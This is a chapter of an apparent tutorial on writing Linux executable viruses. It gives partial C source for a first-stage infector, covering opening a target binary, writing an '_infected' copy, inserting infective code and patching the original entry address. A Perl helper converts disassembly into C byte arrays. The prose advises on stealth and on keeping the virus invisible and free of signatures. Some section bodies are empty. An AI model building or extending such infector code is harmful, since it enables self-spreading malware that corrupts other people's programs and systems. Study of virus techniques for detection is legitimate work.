3. One step closer to the edge (i)

 

To take a significant step forward, you must make a series of finite improvements.

 Donald J. Atwood, General Motors

This chapter introduces the framework of a first stage infector written in plain C. The program will insert and activate one chunk of code into executables specified on the command line. It is not insertable itself.

The code is split it into many parts that manipulate a central data structure. The idea is to replace some of these parts in later chapters to implement improvements and different infection methods. Parts are shown in random order and without any #include statements or prototypes. Identifiers prefixed with TEVWH_ are defined in generated file config.h. See Verifying installed packages. If you need full details a look into the sources of this document should do. Mirrors shows where to get it.

3.1. Dressing up binary code

This script is used throughout the document to convert binary files into valid C code, i.e. definition of a byte array. This could have been a small filter written in perl(1), but we actually need a lot of features.

We need to process the output of both ndisasm and objdump, on multiple platforms. Examples for valid input (i386, sparc, alpha):

08048080  6A04              push byte +0x4
10074:	82 10 20 04	mov	4, %g1
1200000b0:	02 00 bb 27	ldah	gp,2(t12)

The __attribute__ clause is explained in A section called .text.

Initializing the array with string literals (looking like \xDE\xAD\xBE\xEF) is easier. The terminating zero would not work with Doing it in C, however. But then using a list of hexadecimal numbers introduces separating comas, requiring special treatment of the last line.

If command line option -last_line_is_ofs is passed to the program then the last line of disassembly is meant to specify a offset into the code. Actually it's just the last byte of that line. You are free to use any dummy operation, see the example input above. A real world example is at Infection #1. The last instruction itself is not emitted to the byte array. Instead enum constant ENTRY_POINT_OFS is defined.

Source: src/platform/disasm.pl
#!/usr/bin/perl -sw
use strict;

my $LINE = "  %-30s /* %-32s */\n";

$::identfier = 'main' if (!defined($::identfier));
$::size = '' if (!defined($::size));
$::align = '8' if (!defined($::align));
$::section = '.text' if (!defined($::section));

printf "const unsigned char %s[%s]\n", $::identfier, $::size;
print "__attribute__ (( aligned($::align), section(\"$::section\") )) =\n";
print "{\n";

my $code_size = 0;
my @line;
while(<>)
{
  s/^\s+//;		# trim leading white space
  s/\s+$//;		# trim trailing white space
  s/\s+[!;].*//;	# trim trailing comments

  my $addr = (split(/[:\s]+/))[0];
  s/[A-Fa-f0-9]+:?\s+//;

  my @code = split(/\s\s+/);
  my $code = $code[0];
  $code =~ s/\s//g;	# make objdump look like ndisasm

  $code_size += length($code) / 2;
  my $dump = '0x' . substr($code, 0, 2);
  for(my $i = 2; $i < length($code); $i += 2)
  {
    $dump .= ',0x' . substr($code, $i, 2);
  }
  push @line, [ $addr . ': ' . join(' ', @code[1..$#code]), $code, $dump ]
}

my $nr = 0;
my $max = $#line;
$max -= 1 if (defined($::last_line_is_ofs));
while($nr < $max)
{
  printf $LINE, $line[$nr][2] . ',', $line[$nr][0];
  $nr++;
}
printf $LINE, $line[$nr][2], $line[$nr][0];
printf "}; /* %d bytes (%#x) */\n", $code_size, $code_size;
if (defined($::last_line_is_ofs))
{
  my $ofs = substr($line[$nr + 1][1], -2, 2);
  printf "enum { ENTRY_POINT_OFS = 0x%x };\n", hex($ofs);
}

3.2. target.h

3.3. main

3.4. target_open

Modifying a file in place, as opposed to writing a copy, is possible but difficult. And between first and final modification contents of the target is invalid. Imagine a worst-case scenario of a virus infecting /bin/sh being interrupted through a power failure (or emergency shutdown of a hectic admin).

There are a few approaches to change a file while copying.

Using MAP_PRIVATE for argument flags of mmap(2) activates copy-on-write semantics. You can read and write as if you had chosen the read-in-one-go method, but the implementation is more efficient. Unmodified pages are loaded directly from the file. On low memory conditions these pages can be discarded without saving them in swap-space.

Source: src/one_step_closer/open.inc
bool target_open(Target* t, const char* src_filename)
{
  static const char suffix[] = "_infected"; 

  const char* base;
  size_t len;
  char* dst_filename;

  TRACE(stderr, "target_open(%s)\n", src_filename);
  base = strrchr(src_filename, '/');
  base = (base == 0) ? src_filename : base + 1;

  len = strlen(base);
  dst_filename = malloc(len + sizeof(suffix));
  if (dst_filename == 0)
  {
    TRACE(stderr, "Out of memory allocating %d bytes.\n",
      len + sizeof(suffix));
    return false;
  }

  memcpy(dst_filename, base, len);
  memcpy(dst_filename + len, suffix, sizeof(suffix));

  t->fd_src = open(src_filename, O_RDONLY);
  if (t->fd_src >= 0)
  {
    t->filesize = lseek(t->fd_src, 0, SEEK_END);
    if ((off_t)-1 != t->filesize)
    {
      t->aligned_filesize = ALIGN_UP(t->filesize);
      t->p.v = mmap(0, t->filesize, PROT_READ | PROT_WRITE,
	MAP_PRIVATE, t->fd_src, 0);
      if (MAP_FAILED != t->p.v)
      {
        t->fd_dst = open(dst_filename, O_WRONLY | O_CREAT | O_TRUNC, 0775);
	if (t->fd_dst >= 0)
	{
	  free(dst_filename);
	  return true;
        }
	perror("open");
      }
      else
	perror("mmap");
    }
    else
      perror("lseek");
  }
  else
    perror("open");
  free(dst_filename);
  return false;
}

3.5. target_close

3.6. target_is_suitable

A visible virus is a dead virus. Breaking things is quite the opposite of invisibility. So before you even think about polymorphism and stealth mechanisms you should go sure your code does nothing unexpected. On the other hand exhaustive checks of target files will severely increase code size. And verifying signatures and other constant values is likely to make the virus code itself a constant signature. A better approach is to compare the target with the host executable currently running the virus.

Finding a meaningful set of tests is an art in it itself. For example some executables of Red Hat 8.0 have an additional program header of type GNU_EH_FRAME. This means that e_phnum can differ between infector and target.

3.7. target_patch_entry_addr #1

This function is independent from the chosen infection method. The directory name e1 means that this is the first (orthogonal) implementation. Anyway, without this function the behavior of the target is not modified. If the infection methods prevents double infection by design, this can be used for vaccination in the true meaning of the word: Infection with a deactivated mutation makes the target immune against less friendly attackers.

3.8. target_write_infection #1

infection is an array of bytes generated by Dressing up binary code. Constant ENTRY_POINT_OFS points to the location inside this array to patch with the original entry address.

Source: src/one_step_closer/write_infection.inc
unsigned target_write_infection(Target* t)
{
  enum { ADDR_SIZE = sizeof(((Target*)0)->original_entry) }; 
  enum { REST_OFS = ENTRY_POINT_OFS + ADDR_SIZE };

  TRACE(stderr, "target_write_infection ENTRY_POINT_OFS=%d\n",
    ENTRY_POINT_OFS);

  /* i386: first byte is the opcode for "push" */
  write(t->fd_dst, infection, ENTRY_POINT_OFS);

  /* i386: next four bytes is the address to "ret" to */
  write(t->fd_dst, &t->original_entry, sizeof(t->original_entry));

  /* rest of infective code */
  write(t->fd_dst, infection + REST_OFS, sizeof(infection) - REST_OFS);

  return sizeof(infection);
}